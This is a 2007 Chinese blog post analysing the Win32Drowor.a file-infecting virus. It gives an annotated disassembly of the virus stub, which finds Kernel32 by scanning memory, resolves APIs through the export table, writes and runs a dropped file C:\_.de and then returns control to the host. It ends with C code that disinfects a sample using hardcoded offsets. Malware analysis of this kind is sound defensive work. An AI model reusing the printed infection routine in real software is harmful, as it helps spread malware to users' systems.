2007年4月21日星期六

Win32Drowor.a的分析过程和清除手段

************************************************************************************
以下为分析过程
************************************************************************************
00436716 > 55 PUSH EBP
00436717 8BEC MOV EBP,ESP
00436719 83C4 D0 ADD ESP,-30
0043671C 53 PUSH EBX
0043671D 56 PUSH ESI
0043671E 57 PUSH EDI
0043671F 8D75 FC LEA ESI,DWORD PTR SS:[EBP-4]
00436722 8B4424 30 MOV EAX,DWORD PTR SS:[ESP+30]
00436726 25 0000FFFF AND EAX,FFFF0000
////以下逐页比较验证,找到Kernel32的基地址
0043672B 8138 4D5A9000 CMP DWORD PTR DS:[EAX],905A4D
00436731 74 07 JE SHORT v.0043673A
00436733 2D 00100000 SUB EAX,1000
00436738 ^ EB F1 JMP SHORT v.0043672B
0043673A 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
0043673D E8 C8FFFFFF CALL v.0043670A
////EAX中是内存中整个PE映像大小+建议装入地址,减去770A得到新节的起始地址
00436742 2D 0A770000 SUB EAX,770A
//// 定位到PE头
00436747 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
0043674A 8B06 MOV EAX,DWORD PTR DS:[ESI]
0043674C 8B40 3C MOV EAX,DWORD PTR DS:[EAX+3C]
0043674F 0306 ADD EAX,DWORD PTR DS:[ESI]
////定位到数据目录表也就是得到导出表的地址
00436751 8B40 78 MOV EAX,DWORD PTR DS:[EAX+78]
00436754 0306 ADD EAX,DWORD PTR DS:[ESI]
00436756 8BC8 MOV ECX,EAX
////取出AddressOfName
00436758 8B51 20 MOV EDX,DWORD PTR DS:[ECX+20]
0043675B 0316 ADD EDX,DWORD PTR DS:[ESI]
////取出AdressOfNameOrdinals
0043675D 8B59 24 MOV EBX,DWORD PTR DS:[ECX+24]
00436760 031E ADD EBX,DWORD PTR DS:[ESI]
00436762 895D F0 MOV DWORD PTR SS:[EBP-10],EBX
////取出AddressOfFuctions
00436765 8B59 1C MOV EBX,DWORD PTR DS:[ECX+1C]
00436768 031E ADD EBX,DWORD PTR DS:[ESI]
////取出NumberOfName
0043676A 895D EC MOV DWORD PTR SS:[EBP-14],EBX
0043676D 8B41 18 MOV EAX,DWORD PTR DS:[ECX+18]
////以NumberOfName的值做循环,查找想要的到函数入口地址
00436770 8BC8 MOV ECX,EAX
00436772 49 DEC ECX
00436773 85C9 TEST ECX,ECX
00436775 72 5A JB SHORT v.004367D1
00436777 41 INC ECX
00436778 33C0 XOR EAX,EAX
0043677A 8BD8 MOV EBX,EAX
0043677C C1E3 02 SHL EBX,2
0043677F 03DA ADD EBX,EDX
00436781 8B3B MOV EDI,DWORD PTR DS:[EBX]
00436783 033E ADD EDI,DWORD PTR DS:[ESI]
00436785 813F 47657450 CMP DWORD PTR DS:[EDI],50746547
0043678B 75 40 JNZ SHORT v.004367CD
0043678D 8BDF MOV EBX,EDI
0043678F 83C3 04 ADD EBX,4
00436792 813B 726F6341 CMP DWORD PTR DS:[EBX],41636F72
00436798 75 33 JNZ SHORT v.004367CD
0043679A 8BDF MOV EBX,EDI
0043679C 83C3 08 ADD EBX,8
0043679F 813B 64647265 CMP DWORD PTR DS:[EBX],65726464
004367A5 75 26 JNZ SHORT v.004367CD
004367A7 83C7 0C ADD EDI,0C
004367AA 66:813F 7373 CMP WORD PTR DS:[EDI],7373
004367AF 75 1C JNZ SHORT v.004367CD
004367B1 8BD0 MOV EDX,EAX
004367B3 03D2 ADD EDX,EDX
004367B5 0355 F0 ADD EDX,DWORD PTR SS:[EBP-10]
004367B8 0FB712 MOVZX EDX,WORD PTR DS:[EDX]
004367BB C1E2 02 SHL EDX,2
004367BE 0355 EC ADD EDX,DWORD PTR SS:[EBP-14]
004367C1 8B12 MOV EDX,DWORD PTR DS:[EDX]
004367C3 0316 ADD EDX,DWORD PTR DS:[ESI]
004367C5 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
004367C8 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
004367CB EB 04 JMP SHORT v.004367D1
004367CD 40 INC EAX
004367CE 49 DEC ECX
004367CF ^ 75 A9 JNZ SHORT v.0043677A
////以上循环查找函数入口结束

////以下分别获得LoadLibraryA、FreeLibrary、ExitProcess、GetModuleHandleA、User32.DLL、GetMessageA、TranslateMessage、DispathMessageA、WinExec、CreateFileA、WriteFile、CloseHandle的函数地址
004367D1 8B5D F4 MOV EBX,DWORD PTR SS:[EBP-C]
004367D4 8D43 3B LEA EAX,DWORD PTR DS:[EBX+3B]
004367D7 50 PUSH EAX
004367D8 8B06 MOV EAX,DWORD PTR DS:[ESI]
004367DA 50 PUSH EAX
004367DB FF53 04 CALL DWORD PTR DS:[EBX+4]
004367DE 8943 08 MOV DWORD PTR DS:[EBX+8],EAX
004367E1 8D43 48 LEA EAX,DWORD PTR DS:[EBX+48]
004367E4 50 PUSH EAX
004367E5 8B06 MOV EAX,DWORD PTR DS:[ESI]
004367E7 50 PUSH EAX
004367E8 FF53 04 CALL DWORD PTR DS:[EBX+4]
004367EB 8943 0C MOV DWORD PTR DS:[EBX+C],EAX
004367EE 8D43 54 LEA EAX,DWORD PTR DS:[EBX+54]
004367F1 50 PUSH EAX
004367F2 8B06 MOV EAX,DWORD PTR DS:[ESI]
004367F4 50 PUSH EAX
004367F5 FF53 04 CALL DWORD PTR DS:[EBX+4]
004367F8 8943 10 MOV DWORD PTR DS:[EBX+10],EAX
004367FB 8D43 60 LEA EAX,DWORD PTR DS:[EBX+60]
004367FE 50 PUSH EAX
004367FF 8B06 MOV EAX,DWORD PTR DS:[ESI]
00436801 50 PUSH EAX
00436802 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436805 8943 18 MOV DWORD PTR DS:[EBX+18],EAX
00436808 8D43 34 LEA EAX,DWORD PTR DS:[EBX+34]
0043680B 50 PUSH EAX
0043680C FF53 08 CALL DWORD PTR DS:[EBX+8]
0043680F 8BF8 MOV EDI,EAX
00436811 893B MOV DWORD PTR DS:[EBX],EDI
00436813 8D43 71 LEA EAX,DWORD PTR DS:[EBX+71]
00436816 50 PUSH EAX
00436817 57 PUSH EDI
00436818 FF53 04 CALL DWORD PTR DS:[EBX+4]
0043681B 8943 1C MOV DWORD PTR DS:[EBX+1C],EAX
0043681E 8D43 7D LEA EAX,DWORD PTR DS:[EBX+7D]
00436821 50 PUSH EAX
00436822 8B03 MOV EAX,DWORD PTR DS:[EBX]
00436824 50 PUSH EAX
00436825 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436828 8943 20 MOV DWORD PTR DS:[EBX+20],EAX
0043682B 8D83 8E000000 LEA EAX,DWORD PTR DS:[EBX+8E]
00436831 50 PUSH EAX
00436832 8B03 MOV EAX,DWORD PTR DS:[EBX]
00436834 50 PUSH EAX
00436835 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436838 8943 24 MOV DWORD PTR DS:[EBX+24],EAX
0043683B 8D83 9F000000 LEA EAX,DWORD PTR DS:[EBX+9F]
00436841 50 PUSH EAX
00436842 8B06 MOV EAX,DWORD PTR DS:[ESI]
00436844 50 PUSH EAX
00436845 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436848 8943 14 MOV DWORD PTR DS:[EBX+14],EAX
0043684B 8D83 A7010000 LEA EAX,DWORD PTR DS:[EBX+1A7]
00436851 50 PUSH EAX
00436852 8B06 MOV EAX,DWORD PTR DS:[ESI]
00436854 50 PUSH EAX
00436855 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436858 8943 28 MOV DWORD PTR DS:[EBX+28],EAX
0043685B 8D83 B3010000 LEA EAX,DWORD PTR DS:[EBX+1B3]
00436861 50 PUSH EAX
00436862 8B06 MOV EAX,DWORD PTR DS:[ESI]
00436864 50 PUSH EAX
00436865 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436868 8943 2C MOV DWORD PTR DS:[EBX+2C],EAX
0043686B 8D83 BD010000 LEA EAX,DWORD PTR DS:[EBX+1BD]
00436871 50 PUSH EAX
00436872 8B06 MOV EAX,DWORD PTR DS:[ESI]
00436874 50 PUSH EAX
00436875 FF53 04 CALL DWORD PTR DS:[EBX+4]
////调用CreateFileA函数,创建新文件文件C:\_.de,属性可读可写
00436878 8943 30 MOV DWORD PTR DS:[EBX+30],EAX
0043687B 6A 00 PUSH 0
0043687D 6A 00 PUSH 0
0043687F 6A 02 PUSH 2
00436881 6A 00 PUSH 0
00436883 6A 01 PUSH 1
00436885 68 000000C0 PUSH C0000000
0043688A 8D83 A7000000 LEA EAX,DWORD PTR DS:[EBX+A7]
00436890 50 PUSH EAX
00436891 FF53 28 CALL DWORD PTR DS:[EBX+28]
////调用WriteFile函数,将缓冲区数据写入文件,需要写入7531字节,并在0x4366FE处返回成功写入的字节数
00436894 8BF0 MOV ESI,EAX
00436896 89B3 FA760000 MOV DWORD PTR DS:[EBX+76FA],ESI
0043689C 6A 00 PUSH 0
0043689E 8D83 FE760000 LEA EAX,DWORD PTR DS:[EBX+76FE]
004368A4 50 PUSH EAX
004368A5 68 31750000 PUSH 7531
004368AA 8D83 C9010000 LEA EAX,DWORD PTR DS:[EBX+1C9]
004368B0 50 PUSH EAX
004368B1 56 PUSH ESI
004368B2 FF53 2C CALL DWORD PTR DS:[EBX+2C]
////关闭文件
004368B5 8B83 FA760000 MOV EAX,DWORD PTR DS:[EBX+76FA]
004368BB 50 PUSH EAX
004368BC FF53 30 CALL DWORD PTR DS:[EBX+30]
////运行指定文件C:\_.de
004368BF 6A 01 PUSH 1
004368C1 8D83 A7000000 LEA EAX,DWORD PTR DS:[EBX+A7]
004368C7 50 PUSH EAX
004368C8 FF53 14 CALL DWORD PTR DS:[EBX+14]
////跳回AddressOfEntryPoint字段指向的地址继续运行宿主程序
004368CB 8B83 02770000 MOV EAX,DWORD PTR DS:[EBX+7702]
004368D1 0383 06770000 ADD EAX,DWORD PTR DS:[EBX+7706]
004368D7 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
004368DA 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
004368DD FFE0 JMP EAX
****************************************************************************************
下边为清除病毒的代码
****************************************************************************************
//Coded by Santiago
#include
#include

int main(int argc, char *argv[])
{
HANDLE hFile ;
HANDLE hMapping ;
LPVOID lpMapping ;
DWORD dwNumberOfSections ;
PIMAGE_DOS_HEADER pDos_Header ;
PIMAGE_NT_HEADERS32 pNT_Headers ;
PIMAGE_SECTION_HEADER pISHeader ;

hFile = CreateFile(
argv[1],
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_WRITE,
0,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
0
) ;
if(!hFile)
{
printf("Can not open the file!\n") ;
return -1 ;
}
hMapping = CreateFileMapping(
hFile,
NULL,
PAGE_READWRITE,
0,0,NULL
) ;
if(!hMapping)
{
printf("can not open the file mapping!\n") ;
CloseHandle(hFile) ;
return -1 ;
}
lpMapping = MapViewOfFile(
hMapping,
FILE_MAP_READ | FILE_MAP_WRITE,
0,0,0
) ;
if(!lpMapping)
{
printf("can not map a view of a file!\n") ;
CloseHandle(hMapping) ;
CloseHandle(hFile) ;
return -1 ;
}
//分别得到文件头和PE头的起始地址
pDos_Header = (PIMAGE_DOS_HEADER) lpMapping ;
pNT_Headers = (PIMAGE_NT_HEADERS32)((DWORD)lpMapping + pDos_Header->e_lfanew) ;
//还原宿主入口地址和内存中整个PE映像大小
pNT_Headers->OptionalHeader.AddressOfEntryPoint = 0x10AA8 ;
pNT_Headers->OptionalHeader.SizeOfImage = 0x2f000 ;
//清除病毒体,还原宿主长度
SetFilePointer(hFile, 0x2afff, NULL, FILE_BEGIN) ;
SetEndOfFile(hFile) ;
//修复节数量
dwNumberOfSections = pNT_Headers->FileHeader.NumberOfSections ;
dwNumberOfSections-- ;
pNT_Headers->FileHeader.NumberOfSections = dwNumberOfSections ;
UnmapViewOfFile(lpMapping) ;
CloseHandle(hMapping) ;
CloseHandle(hFile) ;
return 0 ;
}
发帖者 时间:

没有评论:

发表评论

订阅: 博文评论 (Atom)